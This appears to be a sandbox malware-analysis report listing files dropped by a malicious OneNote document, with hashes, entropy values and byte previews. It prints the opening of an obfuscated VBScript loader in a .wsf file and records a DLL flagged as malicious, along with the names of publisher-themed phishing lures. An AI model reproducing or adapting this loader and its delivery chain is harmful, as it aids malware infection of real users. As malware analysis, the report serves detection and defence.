                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55113
                                                                                                                                                                                                                  Entropy (8bit):5.216959514455489
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                                  MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                                  SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                                  SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                                  SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):362512
                                                                                                                                                                                                                  Entropy (8bit):7.486504674362876
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:LyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:BWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                                                                                                  MD5:77598658D93EBFB2DB09DD71D0B8F511
                                                                                                                                                                                                                  SHA1:F10EE98CEF0C1CA7117861A7494A3003359B5D93
                                                                                                                                                                                                                  SHA-256:134EEC9B3C40B34973AD3F0001797AC5984476463F035C1283EE365B6FBA2818
                                                                                                                                                                                                                  SHA-512:D3E1792E6AE1D821B910D22C9581456803B21B5722BDA7271C957FBCA8417E158DF9CB06153376D0CCC75B6F77AC0EE4A9D219B598D03422F6AB83D703CD59D5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.R\{..M..Sx.)......mV@...$....................?.....I.......*...*...*...*.....................................................l.q..E.c[B..J..d(.x...........(~......................8.......0.....................bZ./SC.z...{X.w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5136
                                                                                                                                                                                                                  Entropy (8bit):2.7748319905132717
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YsYyfOdDa/uZervY+meHviIklaW//Uc89wTT5mBmlthbXi7Mv/Ie5zSh4Lnqac8d:PnE2/uIPv4om1mAlthbXUFac057ac3
                                                                                                                                                                                                                  MD5:2511A771C683228A0CF927CC5009643D
                                                                                                                                                                                                                  SHA1:C7966E6089539537F2E0B218043B4CAF4605F84C
                                                                                                                                                                                                                  SHA-256:67585B39D91550459C7C103391659657599B66D56AA39698EF27DD11D02CA1BF
                                                                                                                                                                                                                  SHA-512:9630841998E3399249A426E6593B8F48FC224727D6F630E54D873EF28541E902FFC95E4DB0D306EDAD8782F074AC4E48243CB89F4E6F3FBF6ADF3BDAD234CF13
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:./.C..vL....W"v_..l.q..E.c[B..J.................?.....I............................................................................................................................................................dM....C................[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                  Entropy (8bit):0.32593130054714686
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:UPStwxyl/sb+t+Wpys5UMclSqlPMclX/7EMNHXb+lh2RKUEZ+lX1MAx7vKlCXlvN:UJytsqLys2xX/7Esb+6RKQ137v+uT+sv
                                                                                                                                                                                                                  MD5:59F1268DD3462E376D65491D093EEF50
                                                                                                                                                                                                                  SHA1:6938B8CDE0210408649E321E35E2AEB83669E53F
                                                                                                                                                                                                                  SHA-256:53468CBE51028E937517B85AAA937E5FF855D54A8E137C65FF0F120B7966D1AF
                                                                                                                                                                                                                  SHA-512:5969870E18AB39839C9225A36F3C7CD5F1FBA3A74F6A711450EF846E518942780D368A5974A0380CEF85CCF84DB6C6CAA6BC002B57E099D4D19EEBA3B4515E24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.@..`...........................................`...............................X........................@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................^l%m..... .....DG7j.[..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.X.......c9......................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                  Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:tWn:tWn
                                                                                                                                                                                                                  MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                                                                                                                                  SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                                                                                                                                  SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                                                                                                                                  SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:badum tss
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):381
                                                                                                                                                                                                                  Entropy (8bit):5.035593451835013
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
                                                                                                                                                                                                                  MD5:118A489422BE0C5CA0CECF3BB7903C7E
                                                                                                                                                                                                                  SHA1:B90AF089FD0E728E61D532BE80062AED39D98978
                                                                                                                                                                                                                  SHA-256:FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
                                                                                                                                                                                                                  SHA-512:283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):316928
                                                                                                                                                                                                                  Entropy (8bit):7.337848702590508
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                                  MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                                  SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                                  SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                                  SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                  • Filename: click.wsf, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Form - 16 Mar, 2023.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: MBQ24253060297767042_202303161424.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: iMedPub_LTD_4.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: iMedPub_LTD_6.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: INNOVINC.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OMICS.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                                                                                                                                  • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
